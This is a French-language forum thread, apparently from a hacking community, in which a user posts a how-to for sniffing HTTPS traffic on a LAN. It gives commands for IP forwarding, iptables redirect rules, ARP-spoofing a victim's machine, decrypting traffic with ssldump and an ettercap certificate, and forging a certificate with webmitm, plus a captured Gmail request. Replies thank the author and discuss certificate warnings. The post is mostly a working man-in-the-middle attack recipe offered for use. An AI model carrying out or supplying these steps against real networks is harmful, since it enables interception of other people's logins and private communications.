ssl/https sniff avec arpspoof + ssldump

[Nagual]

Voici un simple exemple de sniff https / ssl

on active l'ip forwarding

Code:

debian:/home/s3th#  echo 1 > /proc/sys/net/ipv4/ip_forward

on ajoute quelques règles à iptables

Code:

debian:/home/s3th#  iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
debian:/home/s3th#  iptables -A FORWARD -j ACCEPT

on spoof notre victime

Code:

debian:/home/s3th#  arpspoof -t 192.168.1.59 192.168.1.1

on peut créer son certif avec webmitm -d ou utiliser celui d'ettercap

Code:

debian:/home/s3th# ssldump -n -d -k /usr/share/ettercap/etter.ssl.crt | tee ssldump.log

exemple de capture en live

Code:

New TCP connection #1: 192.168.1.59(3090) <-> 74.125.39.19(80)
0.0201 (0.0201)  C>S
---------------------------------------------------------------
G*T /mail/h/1wndzcfmocomi/?logout&hl=fr H**P/1.1
Host: mail.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.google.com/mail/h/1wndzcfmocomi/?hl=fr&tab=wm&zy=l&gausr=....

exemple de certif avec webmitm

Code:

debian:/home/s3th# webmitm -d
Generating RSA private key, 1024 bit long modulus
..........++++++
.........................................++++++
e is 65537 (0x10001)
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) ¦AU¦:CH
State or Province Name (full name) ¦Some-State¦:Suisse
Locality Name (eg, city) ¦¦:
Organization Name (eg, company) ¦Internet Widgits Pty Ltd¦:
Organizational Unit Name (eg, section) ¦¦:
Common Name (eg, YOUR name) ¦¦:Notre server
Email Address ¦¦:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password ¦¦:
An optional company name ¦¦:
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd
Getting Private key
webmitm: certificate generated
webmitm: relaying transparently

merci seth pour tous tes howto!
je les testerais!!!

et continue comme ça!

[baggi]

hum une petite question, si j'ai bien compris sslstrip permet de ne plus avoir de message d'erreur de certificat sur mon second poste, pourtant aprésa voir suivi a la lettre le tuto dés que je me connecte a un site sécurisé j'ai une erreur de certificat...
ai-je mal compris l'utilitée de sslstrip ou est ce que je fais quelquechose de travers ?

[Hokiko]

Chez moi ça dépend, avec la v0.4 il arrive que j'ai des messages pour les certifs mais ça reste rare. J'ignore à quoi c'est du. En tout cas sous IE ça passe niquel.

[juciguse]

merci seth pour tous tes howto!